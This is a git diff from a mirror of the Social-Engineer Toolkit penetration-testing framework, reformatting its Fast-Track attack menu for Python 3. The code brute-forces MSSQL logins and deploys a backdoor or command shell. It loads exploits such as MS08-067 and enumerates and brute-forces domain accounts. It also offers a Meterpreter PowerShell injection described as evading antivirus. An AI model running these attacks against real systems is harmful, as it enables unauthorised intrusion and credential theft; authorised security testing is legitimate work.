mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-15 07:22:33 +00:00
pep8 and python3 refactoring
This commit is contained in:
parent
262fe6ffed
commit
723613f3ea
5 changed files with 457 additions and 344 deletions
|
@ -31,51 +31,65 @@ try:
|
||||||
# start the menu
|
# start the menu
|
||||||
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
|
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
|
||||||
# take input here
|
# take input here
|
||||||
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
|
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# option 1 scan and attack, option 2 connect directly to mssql
|
# option 1 scan and attack, option 2 connect directly to mssql
|
||||||
# if 1, start scan and attack
|
# if 1, start scan and attack
|
||||||
#
|
#
|
||||||
if attack_vector_sql == '1':
|
if attack_vector_sql == '1':
|
||||||
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
|
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
|
||||||
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
choice = raw_input(
|
||||||
if choice != "1":
|
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
||||||
if choice != "2":
|
if choice != "1":
|
||||||
if choice !="":
|
if choice != "2":
|
||||||
print_error("You did not specify 1 or 2! Please try again.")
|
if choice != "":
|
||||||
choice =raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
print_error(
|
||||||
|
"You did not specify 1 or 2! Please try again.")
|
||||||
|
choice = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
||||||
# grab ip address
|
# grab ip address
|
||||||
if choice == "": choice = "1"
|
if choice == "":
|
||||||
|
choice = "1"
|
||||||
if choice == "1":
|
if choice == "1":
|
||||||
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
|
||||||
if choice == "2":
|
if choice == "2":
|
||||||
while 1:
|
while 1:
|
||||||
range = raw_input(setprompt(["19","21","22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
|
||||||
if not os.path.isfile(range):
|
if not os.path.isfile(range):
|
||||||
print_error("File not found! Please type in the path to the file correctly.")
|
print_error(
|
||||||
|
"File not found! Please type in the path to the file correctly.")
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
if choice == "1": port = "1433"
|
if choice == "1":
|
||||||
if choice == "2": port = "1433"
|
port = "1433"
|
||||||
|
if choice == "2":
|
||||||
|
port = "1433"
|
||||||
# ask for a wordlist
|
# ask for a wordlist
|
||||||
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
|
wordlist = raw_input(setprompt(
|
||||||
if wordlist == "": wordlist = "default"
|
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
|
||||||
|
if wordlist == "":
|
||||||
|
wordlist = "default"
|
||||||
# specify the user to brute force
|
# specify the user to brute force
|
||||||
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
|
username = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
|
||||||
# default to sa
|
# default to sa
|
||||||
if username == "": username = "sa"
|
if username == "":
|
||||||
|
username = "sa"
|
||||||
if username != "sa":
|
if username != "sa":
|
||||||
if not os.path.isfile(username):
|
if not os.path.isfile(username):
|
||||||
print_status("If you were using a file, its not found, using text as username.")
|
print_status(
|
||||||
|
"If you were using a file, its not found, using text as username.")
|
||||||
# import the mssql module from fasttrack
|
# import the mssql module from fasttrack
|
||||||
from src.fasttrack import mssql
|
from src.fasttrack import mssql
|
||||||
# choice from earlier if we want to use a filelist or whatnot
|
# choice from earlier if we want to use a filelist or whatnot
|
||||||
if choice != "2":
|
if choice != "2":
|
||||||
# sql_servers
|
# sql_servers
|
||||||
sql_servers = ''
|
sql_servers = ''
|
||||||
print_status("Hunting for SQL servers.. This may take a little bit.")
|
print_status(
|
||||||
|
"Hunting for SQL servers.. This may take a little bit.")
|
||||||
if "/" in str(range):
|
if "/" in str(range):
|
||||||
iprange = printCIDR(range)
|
iprange = printCIDR(range)
|
||||||
iprange = iprange.split(",")
|
iprange = iprange.split(",")
|
||||||
|
@ -84,7 +98,8 @@ try:
|
||||||
if sqlport != None:
|
if sqlport != None:
|
||||||
sql_servers = sql_servers + host + ":" + sqlport + ","
|
sql_servers = sql_servers + host + ":" + sqlport + ","
|
||||||
else:
|
else:
|
||||||
# use udp discovery to get the SQL server IDP through 1434
|
# use udp discovery to get the SQL server IDP through
|
||||||
|
# 1434
|
||||||
sqlport = get_sql_port(range)
|
sqlport = get_sql_port(range)
|
||||||
# UDP could be closed - defaulting to 1433
|
# UDP could be closed - defaulting to 1433
|
||||||
if sqlport != None:
|
if sqlport != None:
|
||||||
|
@ -94,16 +109,19 @@ try:
|
||||||
if choice == "2":
|
if choice == "2":
|
||||||
if not os.path.isfile(range):
|
if not os.path.isfile(range):
|
||||||
while 1:
|
while 1:
|
||||||
print_warning("Sorry boss. The file was not found. Try again")
|
print_warning(
|
||||||
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
|
"Sorry boss. The file was not found. Try again")
|
||||||
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
|
||||||
if os.path.isfile(range):
|
if os.path.isfile(range):
|
||||||
print_status("Atta boy. Found the file this time. Moving on.")
|
print_status(
|
||||||
|
"Atta boy. Found the file this time. Moving on.")
|
||||||
break
|
break
|
||||||
|
|
||||||
fileopen = file(range, "r").readlines()
|
fileopen = file(range, "r").readlines()
|
||||||
sql_servers = ""
|
sql_servers = ""
|
||||||
for line in fileopen:
|
for line in fileopen:
|
||||||
line=line.rstrip()
|
line = line.rstrip()
|
||||||
sql_servers = sql_servers + line + ","
|
sql_servers = sql_servers + line + ","
|
||||||
|
|
||||||
# this will hold all of the SQL servers eventually
|
# this will hold all of the SQL servers eventually
|
||||||
|
@ -122,13 +140,17 @@ try:
|
||||||
# start loop and brute force
|
# start loop and brute force
|
||||||
for servers in sql_servers:
|
for servers in sql_servers:
|
||||||
|
|
||||||
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
|
# this will return the following format ipaddr + "," +
|
||||||
|
# username + "," + str(port) + "," + passwords
|
||||||
if servers != "":
|
if servers != "":
|
||||||
# if we aren't using a username file
|
# if we aren't using a username file
|
||||||
if not os.path.isfile(username):
|
if not os.path.isfile(username):
|
||||||
sql_success = mssql.brute(servers, username, port, wordlist)
|
sql_success = mssql.brute(
|
||||||
|
servers, username, port, wordlist)
|
||||||
if sql_success != False:
|
if sql_success != False:
|
||||||
# after each success or fail it will break into this to the above with a newline to be parsed later
|
# after each success or fail it will break
|
||||||
|
# into this to the above with a newline to
|
||||||
|
# be parsed later
|
||||||
master_list = master_list + sql_success + ":"
|
master_list = master_list + sql_success + ":"
|
||||||
counter = 1
|
counter = 1
|
||||||
|
|
||||||
|
@ -136,16 +158,20 @@ try:
|
||||||
if os.path.isfile(username):
|
if os.path.isfile(username):
|
||||||
for users in usernames:
|
for users in usernames:
|
||||||
users = users.rstrip()
|
users = users.rstrip()
|
||||||
sql_success = mssql.brute(servers, users, port, wordlist)
|
sql_success = mssql.brute(
|
||||||
# we wont break out of the loop here incase theres multiple usernames we want to find
|
servers, users, port, wordlist)
|
||||||
|
# we wont break out of the loop here incase
|
||||||
|
# theres multiple usernames we want to find
|
||||||
if sql_success != False:
|
if sql_success != False:
|
||||||
master_list = master_list + sql_success + ":"
|
master_list = master_list + sql_success + ":"
|
||||||
counter = 1
|
counter = 1
|
||||||
|
|
||||||
# if we didn't successful attack one
|
# if we didn't successful attack one
|
||||||
if counter == 0:
|
if counter == 0:
|
||||||
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
|
print_warning(
|
||||||
pause = raw_input("Press {return} to continue to the main menu.")
|
"Sorry. Unable to locate or fully compromise a MSSQL Server.")
|
||||||
|
pause = raw_input(
|
||||||
|
"Press {return} to continue to the main menu.")
|
||||||
# if we successfully attacked one
|
# if we successfully attacked one
|
||||||
if counter == 1:
|
if counter == 1:
|
||||||
# need to loop to keep menu going
|
# need to loop to keep menu going
|
||||||
|
@ -154,23 +180,29 @@ try:
|
||||||
counter = 1
|
counter = 1
|
||||||
# here we list the servers we compromised
|
# here we list the servers we compromised
|
||||||
master_names = master_list.split(":")
|
master_names = master_list.split(":")
|
||||||
print_status("Select the compromise SQL server you want to interact with:\n")
|
print_status(
|
||||||
|
"Select the compromise SQL server you want to interact with:\n")
|
||||||
for success in master_names:
|
for success in master_names:
|
||||||
if success != "":
|
if success != "":
|
||||||
success = success.rstrip()
|
success = success.rstrip()
|
||||||
success=success.split(",")
|
success = success.split(",")
|
||||||
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
|
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
|
||||||
print " " + str(counter) + ". " + success
|
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
|
||||||
|
print(" " + str(counter) + ". " + success)
|
||||||
# increment counter
|
# increment counter
|
||||||
counter = counter + 1
|
counter = counter + 1
|
||||||
|
|
||||||
print "\n 99. Return back to the main menu.\n"
|
print("\n 99. Return back to the main menu.\n")
|
||||||
# select the server to interact with
|
# select the server to interact with
|
||||||
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
|
select_server = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
|
||||||
# default 1
|
# default 1
|
||||||
if select_server == "quit" or select_server == "exit": break
|
if select_server == "quit" or select_server == "exit":
|
||||||
if select_server == "": select_server = "1"
|
break
|
||||||
if select_server == "99": break
|
if select_server == "":
|
||||||
|
select_server = "1"
|
||||||
|
if select_server == "99":
|
||||||
|
break
|
||||||
counter = 1
|
counter = 1
|
||||||
for success in master_names:
|
for success in master_names:
|
||||||
if success != "":
|
if success != "":
|
||||||
|
@ -179,22 +211,30 @@ try:
|
||||||
# if we equal the number used above
|
# if we equal the number used above
|
||||||
if counter == int(select_server):
|
if counter == int(select_server):
|
||||||
# ipaddr + "," + username + "," + str(port) + "," + passwords
|
# ipaddr + "," + username + "," + str(port) + "," + passwords
|
||||||
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
|
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
|
||||||
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
|
option = raw_input(
|
||||||
if option == "": option = "1"
|
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
|
||||||
|
if option == "":
|
||||||
|
option = "1"
|
||||||
# if 99 then break
|
# if 99 then break
|
||||||
if option == "99": break
|
if option == "99":
|
||||||
# specify we are using the fasttrack option, this disables some features
|
break
|
||||||
filewrite = file(setdir + "/fasttrack.options", "w")
|
# specify we are using the fasttrack
|
||||||
|
# option, this disables some features
|
||||||
|
filewrite = file(
|
||||||
|
setdir + "/fasttrack.options", "w")
|
||||||
filewrite.write("none")
|
filewrite.write("none")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
# import fasttrack
|
# import fasttrack
|
||||||
if option == "1":
|
if option == "1":
|
||||||
# import payloads for selection and prep
|
# import payloads for selection and
|
||||||
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3])
|
# prep
|
||||||
|
mssql.deploy_hex2binary(
|
||||||
|
success[0], success[2], success[1], success[3])
|
||||||
# straight up connect
|
# straight up connect
|
||||||
if option == "2":
|
if option == "2":
|
||||||
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
|
mssql.cmdshell(success[0], success[2], success[
|
||||||
|
1], success[3], option)
|
||||||
# increment counter
|
# increment counter
|
||||||
counter = counter + 1
|
counter = counter + 1
|
||||||
|
|
||||||
|
@ -202,51 +242,59 @@ try:
|
||||||
# if we want to connect directly to a SQL server
|
# if we want to connect directly to a SQL server
|
||||||
#
|
#
|
||||||
if attack_vector_sql == "2":
|
if attack_vector_sql == "2":
|
||||||
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
|
sql_server = raw_input(setprompt(
|
||||||
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
|
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
|
||||||
if sql_port == "": sql_port = "1433"
|
sql_port = raw_input(
|
||||||
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
|
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
|
||||||
|
if sql_port == "":
|
||||||
|
sql_port = "1433"
|
||||||
|
sql_username = raw_input(
|
||||||
|
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
|
||||||
# default to sa
|
# default to sa
|
||||||
if sql_username == "": sql_username = "sa"
|
if sql_username == "":
|
||||||
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
|
sql_username = "sa"
|
||||||
|
sql_password = raw_input(
|
||||||
|
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
|
||||||
print_status("Connecting to the SQL server...")
|
print_status("Connecting to the SQL server...")
|
||||||
# try connecting
|
# try connecting
|
||||||
# establish base counter for connection
|
# establish base counter for connection
|
||||||
counter = 0
|
counter = 0
|
||||||
try:
|
try:
|
||||||
import _mssql
|
import _mssql
|
||||||
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
|
conn = _mssql.connect(
|
||||||
|
sql_server + ":" + str(sql_port), sql_username, sql_password)
|
||||||
counter = 1
|
counter = 1
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
print e
|
print(e)
|
||||||
print_error("Connection to SQL Server failed. Try again.")
|
print_error("Connection to SQL Server failed. Try again.")
|
||||||
# if we had a successful connection
|
# if we had a successful connection
|
||||||
if counter == 1:
|
if counter == 1:
|
||||||
print_status("Dropping into a SQL shell. Type quit to exit.")
|
print_status(
|
||||||
|
"Dropping into a SQL shell. Type quit to exit.")
|
||||||
# loop forever
|
# loop forever
|
||||||
while 1:
|
while 1:
|
||||||
# enter the sql command
|
# enter the sql command
|
||||||
sql_shell = raw_input("Enter your SQL command here: ")
|
sql_shell = raw_input("Enter your SQL command here: ")
|
||||||
if sql_shell == "quit" or sql_shell == "exit":
|
if sql_shell == "quit" or sql_shell == "exit":
|
||||||
print_status("Exiting the SQL shell and returning to menu.")
|
print_status(
|
||||||
|
"Exiting the SQL shell and returning to menu.")
|
||||||
break
|
break
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# execute the query
|
# execute the query
|
||||||
sql_query = conn.execute_query(sql_shell)
|
sql_query = conn.execute_query(sql_shell)
|
||||||
# return results
|
# return results
|
||||||
print "\n"
|
print("\n")
|
||||||
for data in conn:
|
for data in conn:
|
||||||
data = str(data)
|
data = str(data)
|
||||||
data = data.replace("\\n\\t", "\n")
|
data = data.replace("\\n\\t", "\n")
|
||||||
data = data.replace("\\n", "\n")
|
data = data.replace("\\n", "\n")
|
||||||
data = data.replace("{0: '", "")
|
data = data.replace("{0: '", "")
|
||||||
data = data.replace("'}", "")
|
data = data.replace("'}", "")
|
||||||
print data
|
print(data)
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
|
print_warning(
|
||||||
|
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
|
||||||
|
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -255,36 +303,50 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "2":
|
if attack_vector == "2":
|
||||||
# start the menu
|
# start the menu
|
||||||
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
|
create_menu(text.fasttrack_exploits_text1,
|
||||||
|
text.fasttrack_exploits_menu1)
|
||||||
# enter the exploits menu here
|
# enter the exploits menu here
|
||||||
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
|
range = raw_input(
|
||||||
|
setprompt(["19", "24"], "Select the number of the exploit you want"))
|
||||||
|
|
||||||
# ms08067
|
# ms08067
|
||||||
if range == "1":
|
if range == "1":
|
||||||
try: reload(src.fasttrack.exploits.ms08067)
|
try:
|
||||||
except: import src.fasttrack.exploits.ms08067
|
reload(src.fasttrack.exploits.ms08067)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.ms08067
|
||||||
|
|
||||||
# firefox 3.6.16
|
# firefox 3.6.16
|
||||||
if range == "2":
|
if range == "2":
|
||||||
try: reload(src.fasttrack.exploits.firefox_3_6_16)
|
try:
|
||||||
except: import src.fasttrack.exploits.firefox_3_6_16
|
reload(src.fasttrack.exploits.firefox_3_6_16)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.firefox_3_6_16
|
||||||
# solarwinds
|
# solarwinds
|
||||||
if range == "3":
|
if range == "3":
|
||||||
try: reload(src.fasttrack.exploits.solarwinds)
|
try:
|
||||||
except: import src.fasttrack.exploits.solarwinds
|
reload(src.fasttrack.exploits.solarwinds)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.solarwinds
|
||||||
|
|
||||||
# rdp DoS
|
# rdp DoS
|
||||||
if range == "4":
|
if range == "4":
|
||||||
try: reload(src.fasttrack.exploits.rdpdos)
|
try:
|
||||||
except: import src.fasttrack.exploits.rdpdos
|
reload(src.fasttrack.exploits.rdpdos)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.rdpdos
|
||||||
|
|
||||||
if range == "5":
|
if range == "5":
|
||||||
try: reload(src.fasttrack.exploits.mysql_bypass)
|
try:
|
||||||
except: import src.fasttrack.exploits.mysql_bypass
|
reload(src.fasttrack.exploits.mysql_bypass)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.mysql_bypass
|
||||||
|
|
||||||
if range == "6":
|
if range == "6":
|
||||||
try: reload(src.fasttrack.exploits.f5)
|
try:
|
||||||
except: import src.fasttrack.exploits.f5
|
reload(src.fasttrack.exploits.f5)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.f5
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -293,9 +355,10 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "3":
|
if attack_vector == "3":
|
||||||
# load sccm attack
|
# load sccm attack
|
||||||
try: reload(src.fasttrack.sccm.sccm_main)
|
try:
|
||||||
except: import src.fasttrack.sccm.sccm_main
|
reload(src.fasttrack.sccm.sccm_main)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.sccm.sccm_main
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -304,8 +367,8 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "4":
|
if attack_vector == "4":
|
||||||
# load drac menu
|
# load drac menu
|
||||||
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
|
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
|
||||||
|
(definepath), shell=True).wait()
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -321,13 +384,16 @@ try:
|
||||||
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|
||||||
|______|
|
|______|
|
||||||
""")
|
""")
|
||||||
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
|
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
|
||||||
print "\n"
|
print("\n")
|
||||||
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
|
ipaddr = raw_input(
|
||||||
|
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
|
||||||
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
|
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
|
||||||
break
|
break
|
||||||
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
|
print_status(
|
||||||
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
|
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
|
||||||
|
dict = raw_input(setprompt(
|
||||||
|
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
|
||||||
# if we are using the built in one
|
# if we are using the built in one
|
||||||
if dict == "":
|
if dict == "":
|
||||||
# write out a file
|
# write out a file
|
||||||
|
@ -343,20 +409,29 @@ try:
|
||||||
dict = ""
|
dict = ""
|
||||||
|
|
||||||
if dict != "":
|
if dict != "":
|
||||||
print_warning("You are about to brute force user accounts, be careful for lockouts.")
|
print_warning(
|
||||||
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
|
"You are about to brute force user accounts, be careful for lockouts.")
|
||||||
|
choice = raw_input(
|
||||||
|
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
|
||||||
if choice.lower() == "n" or choice.lower() == "no":
|
if choice.lower() == "n" or choice.lower() == "no":
|
||||||
print_status("Okay. Not brute forcing user accounts *phew*.")
|
print_status(
|
||||||
|
"Okay. Not brute forcing user accounts *phew*.")
|
||||||
dict = ""
|
dict = ""
|
||||||
|
|
||||||
# next we see what rid we want to start
|
# next we see what rid we want to start
|
||||||
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
|
start_rid = raw_input(
|
||||||
if start_rid == "": start_rid = "500"
|
setprompt(["31"], "What RID do you want to start at [500]"))
|
||||||
|
if start_rid == "":
|
||||||
|
start_rid = "500"
|
||||||
# stop rid
|
# stop rid
|
||||||
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
|
stop_rid = raw_input(
|
||||||
if stop_rid == "": stop_rid = "15000"
|
setprompt(["31"], "What RID do you want to stop at [15000]"))
|
||||||
print_status("Launching RID_ENUM to start enumerating user accounts...")
|
if stop_rid == "":
|
||||||
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
|
stop_rid = "15000"
|
||||||
|
print_status(
|
||||||
|
"Launching RID_ENUM to start enumerating user accounts...")
|
||||||
|
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" %
|
||||||
|
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
|
||||||
|
|
||||||
# once we are finished, prompt.
|
# once we are finished, prompt.
|
||||||
print_status("Everything is finished!")
|
print_status("Everything is finished!")
|
||||||
|
@ -368,9 +443,11 @@ try:
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "6":
|
if attack_vector == "6":
|
||||||
print "\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n"
|
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
|
||||||
try: reload(src.fasttrack.psexec)
|
try:
|
||||||
except: import src.fasttrack.psexec
|
reload(src.fasttrack.psexec)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.psexec
|
||||||
|
|
||||||
# handle keyboard exceptions
|
# handle keyboard exceptions
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
|
|
|
@ -62,16 +62,16 @@ webattack_menu = ['Java Applet Attack Method',
|
||||||
'Web Jacking Attack Method',
|
'Web Jacking Attack Method',
|
||||||
'Multi-Attack Web Method',
|
'Multi-Attack Web Method',
|
||||||
'Full Screen Attack Method',
|
'Full Screen Attack Method',
|
||||||
'HTA Attack Method',
|
'HTA Attack Method',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_menu = ['Microsoft SQL Bruter',
|
fasttrack_menu = ['Microsoft SQL Bruter',
|
||||||
'Custom Exploits',
|
'Custom Exploits',
|
||||||
'SCCM Attack Vector',
|
'SCCM Attack Vector',
|
||||||
'Dell DRAC/Chassis Default Checker',
|
'Dell DRAC/Chassis Default Checker',
|
||||||
'RID_ENUM - User Enumeration Attack',
|
'RID_ENUM - User Enumeration Attack',
|
||||||
'PSEXEC Powershell Injection',
|
'PSEXEC Powershell Injection',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_text = ("""
|
fasttrack_text = ("""
|
||||||
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
|
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
|
||||||
|
@ -81,12 +81,12 @@ completely rewritten and customized from scratch as to improve functionality and
|
||||||
""")
|
""")
|
||||||
|
|
||||||
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
|
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
|
||||||
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
|
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
|
||||||
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
|
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
|
||||||
'RDP | Use after Free - Denial of Service',
|
'RDP | Use after Free - Denial of Service',
|
||||||
'MySQL Authentication Bypass Exploit',
|
'MySQL Authentication Bypass Exploit',
|
||||||
'F5 Root Authentication Bypass Exploit',
|
'F5 Root Authentication Bypass Exploit',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_exploits_text1 = ("""
|
fasttrack_exploits_text1 = ("""
|
||||||
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
|
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
|
||||||
|
@ -94,8 +94,8 @@ menu has obscure exploits and ones that are primarily python driven. This will c
|
||||||
""")
|
""")
|
||||||
|
|
||||||
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
|
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
|
||||||
'Connect directly to MSSQL',
|
'Connect directly to MSSQL',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_mssql_text1 = ("""
|
fasttrack_mssql_text1 = ("""
|
||||||
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
|
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
|
||||||
|
@ -241,13 +241,13 @@ infectious_text = """
|
||||||
if operating_system != "windows":
|
if operating_system != "windows":
|
||||||
if msf_path != False:
|
if msf_path != False:
|
||||||
payload_menu_1 = [
|
payload_menu_1 = [
|
||||||
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
|
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
|
||||||
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
